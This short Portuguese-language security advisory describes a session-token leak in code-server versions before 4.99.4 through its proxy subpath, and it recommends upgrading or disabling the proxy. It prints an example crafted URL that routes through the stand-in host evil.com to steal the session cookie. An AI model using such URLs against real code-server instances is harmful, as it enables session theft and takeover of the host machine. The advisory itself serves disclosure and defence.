Code-Asher

**Nome do Software Vulnerável e Versões Afetadas** Versões do code-server anteriores à 4.99.4 **Descrição** A vulnerabilidade permite que um atacante obtenha acesso ao token de sessão por meio de uma URL maliciosamente elaborada utilizando o subcaminho de proxy. Isso pode resultar no atacante utilizando o proxy para acessar um domínio arbitrário, potencialmente exfiltrando o token de sessão de um usuário. A URL maliciosa, por exemplo `https://<code-server>/proxy/test@evil.com/path`, seria encaminhada via proxy para `test@evil.com/path`. Com acesso ao cookie de sessão, o atacante pode fazer login no code-server e obter acesso completo à máquina que hospeda o code-server, com os privilégios do usuário que executa o code-server. **Recomendações** Para versões anteriores à 4.99.4, atualize para a versão 4.99.4 para resolver o problema. Como medida paliativa temporária, considere desabilitar o proxy integrado até que uma correção esteja disponível. Restrinja o acesso ao subcaminho de proxy para minimizar o risco de exploração. Evite clicar em links maliciosamente elaborados que façam referência ao subcaminho /proxy em instâncias do code-server.